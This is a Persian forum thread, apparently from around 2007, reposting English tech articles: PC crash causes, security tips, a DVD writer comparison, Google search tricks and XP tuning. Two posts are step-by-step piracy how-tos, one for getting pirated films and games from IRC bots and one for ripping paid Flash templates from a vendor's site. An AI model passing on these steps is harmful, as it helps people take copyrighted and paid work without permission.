PDA

مشاهده نسخه کامل : English Articles



Master
28-04-07, 23:21
سلام ..میخوام این بخش رو اختصاص بدم به مقالات خارجی و صد البته به زبان شیرین انگلیسی ... این مجموعه مقالات حاصل تلاش 3 ساله یکی از دوستان بنده هست (از سایت پراجکت دابلیو)که الان دست بنده است و تعدادشون به بیش از 1000 عنوان میرسه که از هک سایت گرفته تا جعل عناوین و آموزش های مختلف برنامه نویسی و ... در یک کلام از شیر مرغ تا جون آدمیزاد در این ثرد خواهد گنجید ... و همینطور این هم باید اضافه کنم که تعدادی از این مقاله ها هیچ وقت پابلیک نشدن ..و اولین بار اینجا دارن پابلیک میشن .. تمامی مقالات در زمینه اورکلاکینگ ..هکینگ ..سرچ ..هاستینگ.. گرافیک و .. در این بخش قرار دارند و با یه سرچ کوچیک میبینید که چه حجم عظیم اطلاعاتی رو پیش رو دارید ...
صد البتهبه مقالاتی هم خواهید رسید که مروبط به 3 4 و حتی 5 سال پیش میشن ... اما به خاطر سرچ انجن ها و رفرنس اونا به سایت قرار داده شدن ..
بسیاری از مقالات از انچنان پتانسیلی برخوردارند که اگه ترجمه بشه و در بخشهای مختلف سایت قرار بگیره هیچ سایت و یا فورم ایرانی یارای مقابله با اون رو نخواهد داشت ..این رو به جرعت میگم که این بخش سایت رو به قدرمتند ترین در نوع خودش بدل میکنه ... قبل از پست دادن مطلبی حتما سرچی تو این تاپیک بکنید و مطالب رو از نظر بگذرونید .چه شما درمورد سایت ..هاستینگ (رایگان و ...) دنبال مطلبی هستید ..چه یک اور کلاکر خفن و یا گیمر و حتی یک فیلسوف ...:1. (27): در ضمن بخش هایی دراین تاپیک هست که بدرد کارا های روزانتون میخوره مثل گوگل سیکرت (چگونگی سرچ موزیک فیلم کرک و ...بصورت رایگان و فول ) و از این قبیل کارها
خوب حرف زیاد زدم .سرتون رو درد اوردم .
اگر شما هم مقاله منحصر به فرد و یا جالبی به زبان انگلیسی داشتید در این تاپیک قرار بدید ...

یا علی :1. (35):



خوب دوستان عزیز این هم از مجموعه تمامی مقالات کامپیوتری و هک و غیره که بیش از 1000 مقاله هست و حدود 256 عدد از اون مقالات رو تو همین تاپیک برای اولین بار گذاشتم .. حالا هم لینک دنلود کل مجموعه رو براتون قرار میدم و در پست اول هم برای راحتی شما قرار میدم ... اگه کسی اکونت پریمیوم داره این فایل رو دقیقا بدون تغییر رو یک بار دیگه آپلود کنه تا پاک نشه ... پسورد هم پی سی نتورک قرار داده بشه کهمعین کنند مکان دنلود هست .. خواهشا مابقی تغییر نکنه ...
با تشکر
حسین



hey guys ... after all i decided to share one of my ebook collections with you
as i once did it years ago ..here it is enjoy and also remember to read these:

In this package alone, there are over 1000+ tutorial files, that I have been collecting for over 3 years now, everything from hacking to lockpicking. I hope you enjoy this package, and I will hopefully release more packages similer to this in the future, with more tutorials of course Smile

First Date of Distribution :Year 2004
Email: terrorist_ak47@hotmail.com

Redistributed By Master in year 2005
Master.huricane@gmail.com

3th distribution By Master in Year 2008((After whole 3 Years)
Master.huricane@gmail.com

Hey guys there are great articles which is not yet outdated ... more than 90% is Useful and needless to say i have added some other articles which i found useful such as cracking win xp pass by bare hands!Massive Collection of Computer Ebooks in more than 100 fields etc ...

try to redistribute this package and remember to respect us and if you are seeking new massive collections of Ebook just Email us ....
bY THE way i spreaded this package once in year 2005 i think .. at "ProjectW" again handed it over to some of my friends in 2007 , one of them tried to make money out of this collection and that really bothered me ! so i decided to share it once more again and also needless to say ive been updating this collection and im glad to say this package Completely differs from the previously distributed ones ..as i mentioned once ... you may not see the difference at the first glance ... just check it out when you encounter a problem ! everything is just prepared from hacking bios to windows , some stuff may be completely out dated but the rest are still useful .


and the Next Article Package updates will be out soon !

Regards
Master
Master.huricane@gmail.com




Only the registered members can see the link

Master
28-04-07, 23:25
Not Sure If Many People Use This Site, however heres A Few Steps To getting In.. And Getting The Latest Games..

Right 1st You Need mIRC (Download Below)

Only the registered members can see the link


Once Downloaded And Installed.. Next Step Is To Get Yourself Connected To The Datavault Network..

Step 1 :- Open irc, Goto Tools,Options. Then Servers, Click Add
Under Description Type : DataVault
Under IRC Server Type : irc.addictz.net
Under Port(S) Type : 6667-6669

Now Click Ok..

Step 2 : Connecting To Irc.Addictz.Net

Goto Tools/Options/Servers
Select Datavault From Drop Down Menu
Tick "New Server Window"
Then Click Connect

A New Window Will Open Telling You That You Are Connecting To Irc.Addictz.net

Step 3 : Now You Have To Register YourSelf.

In The Window Type /msg nickserv register "your Password" "Your Valid Email"
Next Type /msg NickServ IDENTIFY "The Password You Just Entered"

It Should Now Say Your Registered!

Now Type /J #Datavault

Step 4 : The Bots In DataVault Spam What They Host Every 1 Hour, Becareful Not To Spam These Or Else You Will Be Banned..

Every Hour You Will See What Looks Like Below :-

** To request a file type: "/msg slut02 BITCH send #x
#1 392x [0.7G] Torque.DVDRiP.XviD-BRUTUS
#2 1509x [0.7G] The.Butterfly.Effect.DVDRip.XviD-DMT

It's Simple To Request A Download Now..

There Are Different Bots With Different Names, Ie Slut02 Is Just One Bot, There Are More Called Dv44, Dv33 Slut03 Etc.. However The Trigger Principle Is The Sa,e

Now If For Example You Wanted To Download "The ButterFly Effect", In The Main Chat Window You Would Type or Copy /msg slut02 BITCH send #2

Let Me Explaine.. /msg Is The Trigger, Slut02 Is The Bot BITCH and Send Are Both Triggers #2 Is The File Number You Want. Each Bot Can Host Numerouse Files, Ie #1 Being Another Film, #3 Also Being Another Film.

Once You Have Done That And Press Return, Just Sit Back And Wait.. Either The Download Will Start Straight Away, Or You Will Be Qued (*Cough Dodgy Spelling*)

Right Now To The Benifits Of #Datavault..

1: The Latest Release Of Most Films And Games.
2: 99.99% The Time You Get To Download At You Max BandWidth No Matter Your Connection (Either 56k (Omg Dont Download A 3 Gig File On That!!), Or A T1/OC3 Connection))

I Hope Someone Finds This HelpFull, If It's In The Wrong Place/ Or Inappropriate Then Plz Delete And Serve Me The Warning I Deserve....

Edit : It's A Good Idea To Have Auto Accept Dcc On, Incase Your Away When You Come InLine For Your Download, Generally Even If Your 20th In Que And It Says 3 Hours Wait, Your Prolly Looking At Around 30 Mins Waiting Slot..

Any Problems Please Let Me Know.. NN Peeps..

Master
28-04-07, 23:27
-[ How to rip Dynamic Flash Template ]-

How to Rip TM Dynamic Flash Templates
by: Baisan

What you need:

Sample dynamic flash template from TM website
Sothink SWF Decompiler
Macromedia Flash
Yourself


1. browse or search your favorite dynamic flash template in TM website. If you got one... click the "view" link and new window will open with dynamic flash.. loading...

2. If the movie fully loaded, click View -> Source in your browser to bring the source code of the current page and in the source code, search for "IFRAME" and you will see the iframe page. In this example were going to try the 7045 dynamic template. get the URL(ex.
Only the registered members can see the link) then paste it to your browser... easy eh? wait! dont be to excited... erase the .html and change it to swf then press enter then you'll see the flash movie again icon_smile.gif.

3. copy the URL and download that SWF file.. use your favorite download manager.. mine I used flashget icon_smile.gif NOTE: dont close the browser we may need that later on.

4. open your Sothink SWF decompiler... click "Quick Open" then browse where you download your SWF/movie file. Click Export FLA to export your SWF to FLA, in short, save it as FLA icon_smile.gif

5. Open your Macromedia FLash and open the saved FLA file. press Control+Enter or publish the file... then wallah! the output window will come up with "Error opening URL blah blah blah..." dont panic, that error will help you where to get the remaining files.

6. Copy the first error, example: "7045_main.html" then go back to your browser and replace the 7045.swf to 7045_main.html press enter and you'll see a lot of text... nonsense text icon_lol.gif that text are your contents...

NOTE: when you save the remaining files dont forget to save with underscore sign (_) in the front on the file without the TM item number (e.g. 7045) if it is html save it as "_main.html" and same with the image save it as "_works1.jpg" save them where you save the FLA and SWF files. Continue browsing the file inside Flash application so you can track the remaining files... do the same until you finish downloading all the remaining the files.

Master
28-04-07, 23:29
10 reasons why PCs crash U must Know

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is Only the registered members can see the link If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates ( Only the registered members can see the link). Another is Norton AntiVirus 2000, made by Symantec ( Only the registered members can see the link).

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from Only the registered members can see the link

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from Only the registered members can see the link or Only the registered members can see the link

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

Master
28-04-07, 23:33
10 Fast and Free Security Enhancements
PC magazine.

Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.

1. Check Windows Update and Office Update regularly (_Only the registered members can see the link); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate (_Only the registered members can see the link) and ZoneAlarm (_Only the registered members can see the link) offer free versions.


3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_Only the registered members can see the link). SpyBot is also paranoid and ruthless in hunting out tracking cookies.

4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And doublecheck your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _Only the registered members can see the link

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _Only the registered members can see the link so that you learn about emerging threats quickly and can take proper precautions.

10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."

Master
28-04-07, 23:34
16x Dvd+-rw Dl Dvd Writer Comparison Guide

Source:
CODE
Only the registered members can see the link


Since the introduction of double layer DVD writers, the interest has been quite overwhelming and is why we keep bringing you reviews of these highly popular drives. The anticipation has now turned into down right obsession and it has become a key component in any current or new system build, thanks to the declining prices and continued media hype. Manufacturers are quite aware of the fascination and is why they have each been releasing their own products which excel in at least one area of the testing methodology used in most reviews. This has led to some confusion as to which drive is best suited for the individuals needs. Today, we compare four 16x double layer drives and highlight both the strong and weak points in order to give you a better idea of which drive is best suited for you.


In this comparison guide, we will be looking at four of the top 16x drives to hit the market, the Pioneer DVR-108, NEC ND3500A, Lite-On SOHW-1633s and the new LG GSA-4160B. We will cover everything from design and features to performance and price. Let's begin with a quick look at each of these drives.


As far as the front bezel design goes, the LG-GSA4160B is by far the most attractive drive of the bunch. However, for those who are looking for a headphone jack, the Lite-On drive is the only DL writer offering a headphone jack, as well as volume control. The Pioneer and NEC drives, in my opinion, are the ugliest drives, with a very plain look that just wants to make you hide the drive period. Although we only obtained the 4160B in black, all these drives are offered with both white and black bezels. If you opt for the more expensive Pioneer "XL" model, it has the most impressive looks of any drive in the market. However, this will come at a very hefty price tag, considering they contain different firmware as well that offer a few extra features.

So, we have determined which is the sexiest-looking drive, but what about performance? I've done some extensive testing on each model to determine which is indeed the most impressive of the bunch. But before we show you performance results, let's briefly look at the features and what they have to offer.

Features



Each one of these drives has there disappointments when it comes to features. Let's compare each to see what they really offer.



DVD Writing



DVD+R DVD-R DVD+RW DVD-RW
LG GSA-4160B 16x 8x 4x 4x
Lite-On SOHW-1633s 16x 8x 4x 4x
NEC ND-3500A 16x 16x 4x 4x
Pioneer DVR-108 16x 16x 4x 4x



While all these drives are indeed 16x models, only two will write to both formats at this speed. The LG GSA-4160B and the Lite-On SOHW-1633s only support 8x DVD-R writing. So if you are one who only prefers this format, the NEC or Pioneer would be the best choice. All of these drives support writing to DVD re-writable media at 4x.



DVD+R9 Double Layer Writing



Write Speed
LG GSA-4160B 2.4x
Lite-On SOHW-1633s 2.4x
NEC ND-3500A 4x
Pioneer DVR-108 4x



The major disappointment with both the LG and the Lite-On 16x drives is the lack of 4x double layer writing support. Pioneer and NEC seem to be the only manufacturers to jump in and release second generation double layer drives supporting much faster 4x writing. In fact, the jump from 2.4x to 4x is quite substantial as we will show you a bit later in this comparison.



DVD-RAM Support



Supported Read Write
LG GSA-4160B YES 5x 5x
Lite-On SOHW-1633s NO NO NO
NEC ND-3500A NO NO NO
Pioneer DVR-108 YES 2x NO



Now this is where both the LG GSA-4120B and GSA-4160B shine above the rest. In fact, it is what has made these drives the most popular DVD writers on the market. Unlike the rest in the roundup, it is a triple format burner, offering full support for DVD-RAM media. The other drives do not support it, with the exception of the Pioneer DVR-108 which supports reading of DVD-RAM discs at 2x. I personally don't see the point in offering only read capabilities, but it's at least one extra feature added to distinguish it from the rest. Fast 5x support of the LG GSA-4160 will actually be tested a bit later in this article.



CDR Writing



CDR CDRW
LG GSA-4160B 40x 24x
Lite-On SOHW-1633s 48x 24x
NEC ND-3500A 48x 24x
Pioneer DVR-108 32x 24x



The fastest CDR writers of the bunch are the Lite-On SOHW-1633s and the NEC ND-3500A. With their support for 48x writing, they make a great all-in-one drive for many users. The only drive lacking in this lineup is the Pioneer DVR-108. Why they opted for only 32x writing is still quite puzzling and is actually why I have found that many are choosing the NEC over the Pioneer. The LG GSA-4160B should not be left out of consideration though. We will show you later that the difference in write times between 40x and 48x is not much to brag about.



Bitsetting Support



One feature I've found that is most important for many users is bitsetting support. Let's compare these drives and see what they offer.



DVD+R/RW Support DVD+R DL Support
LG GSA-4160B NO NO
Lite-On SOHW-1633s YES NO
NEC ND-3500A NO YES
Pioneer DVR-108 NO YES



The LG GSA-4160B does not offer bitsetting support out of the box. However, it is very likely that you will be able to obtain support through an excellent third-party tool called DVDInfo Pro. Right now, they only support the GSA-4120B, but I'm confident with the author that support for this drive will be likely. LG firmware is very hard to hack, however some select few have been able to do so. Using Lite-On's booktype utility, you can change the booktype of DVD+R/RW media, however, the firmware does not automatically change booktype of DVD+R DL discs to DVD-ROM like the NEC and Pioneer models do.



Additional Features



As far as other features go, all these drives have a 2MB buffer but offer some sort of buffer under-run protection, which all work exceptionally well. This is especially useful if you will be burning discs at 16x, which I personally don't recommend just yet. As our individual tests of these drives revealed, burning at this speed is quite unstable, with the exception of the Lite-On SOHW-1633s.

Master
28-04-07, 23:36
20 Great Google Secrets



Only the registered members can see the link

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif



Google is clearly the best general-purpose search engine on the Web (see

Only the registered members can see the link

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at

Only the registered members can see the link

. Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as

Only the registered members can see the link

, you can enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in

link:Only the registered members can see the link


Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(Only the registered members can see the link)

lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."

Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search

(Only the registered members can see the link).




Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(Only the registered members can see the link)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(Only the registered members can see the link),

which indexes products from online stores, and Google Catalogs
CODE
(Only the registered members can see the link),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at

Only the registered members can see the link

You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(Only the registered members can see the link)

monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts

(Only the registered members can see the link).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(Only the registered members can see the link),

a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search

(Only the registered members can see the link),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from
CODE
Only the registered members can see the link

. See the figures for two more examples, and visit

Only the registered members can see the link

for more.

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.


Online Extra: More Google Tips


Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE
Only the registered members can see the link

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif


), but an easier way is to do a Google daterange: search by filling in a form at

Only the registered members can see the link or Only the registered members can see the link

. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(Only the registered members can see the link).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(Only the registered members can see the link).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.

Master
28-04-07, 23:38
Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.
1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

